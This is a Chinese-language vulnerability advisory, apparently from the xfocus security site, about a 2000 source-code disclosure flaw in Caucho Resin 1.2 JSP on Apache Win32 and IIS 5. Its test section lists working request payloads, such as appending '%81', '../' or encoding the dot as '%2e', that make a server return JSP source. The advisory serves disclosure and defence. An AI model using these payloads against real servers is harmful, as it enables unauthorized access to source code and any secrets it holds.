xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version
 最近严重漏洞 
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞

Caucho Technology Resin 1.2 JSP存在源代码泄露问题


发布时间:2000-11-24
更新时间:2000-10-24
严重程度:
威胁程度:远程非授权文件存取
错误类型:输入验证错误
利用方式:服务器模式

受影响系统
Caucho Technology Resin 1.2
   - Microsoft IIS 5.0
      + Microsoft Windows NT 2000
   - Apache Group Apache 1.3.9win32
详细描述
Resin是一个servlet,是支持JAVA和JAVASCRIPT引擎的JSP,
ServletExec会在当HTTP请求中包含一些特殊字符的时候返回JSP的源代码,这个漏洞
依靠RESIN所运行的系统。

测试代码
Apache (Win32):
..
%2e..
%81
%82
Example: http://target/filename.jsp%81

Resin Web Server:
../
Example: http://target/filename.jsp../


IIS 5 requesting the URL encoded with ASCII:
'%2' instead of '.'
Example: http://target/filename%2ejsp

解决方案
尚无

相关信息
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved